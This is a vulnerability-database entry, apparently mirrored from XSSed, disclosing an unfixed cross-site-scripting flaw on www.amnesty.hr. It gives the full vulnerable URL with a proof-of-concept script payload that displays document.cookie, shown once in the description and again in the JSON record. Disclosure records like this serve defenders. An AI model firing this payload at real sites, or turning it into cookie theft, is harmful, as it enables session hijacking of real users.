Search...

Unfixed XSS vulnerability at www.amnesty.hr

2009-08-27T00:00:00

ID XSSED:63756
Type xssed
Reporter Dark.Man
Modified 2010-05-07T00:00:00

Description

Security researcher Dark.Man, has submitted on 27/08/2009 a cross-site-scripting (XSS) vulnerability affecting www.amnesty.hr, which at the time of submission ranked 14956638 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.amnesty.hr/stranica.php?sifra_str=opca_deklaracija"><script>alert(document.cookie)</script>

JSON Vulners Source

Initial Source

{"enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-03-20T00:54:06"}, "dependencies": {"references": [], "modified": "2016-03-20T00:54:06"}, "vulnersScore": -0.0}, "reporter": "Dark.Man", "id": "XSSED:63756", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2009-08-27T00:00:00", "history": [], "description": "Security researcher Dark.Man, has submitted on 27/08/2009 a cross-site-scripting (XSS) vulnerability affecting www.amnesty.hr, which at the time of submission ranked 14956638 on the web according to Alexa. \nWe manually validated and published a mirror of this vulnerability on 05/07/2010. It is currently unfixed. \nIf you believe that this security issue has been corrected, please send us an e-mail.\n\nVulnerable URL: http://www.amnesty.hr/stranica.php?sifra_str=opca_deklaracija\"><script>alert(document.cookie)</script>", "bulletinFamily": "bugbounty", "viewCount": 0, "cvelist": [], "type": "xssed", "hash": "14cc68202958a0277421d19d6255d6bc9f5ba4a9ee4d3d8b44fef3b2a1a37192", "references": ["http://www.amnesty.hr"], "title": "Unfixed XSS vulnerability at www.amnesty.hr", "href": "http://www.xssed.com/mirror/63756/", "lastseen": "2016-03-20T00:54:06", "edition": 1, "objectVersion": "1.2", "modified": "2010-05-07T00:00:00"}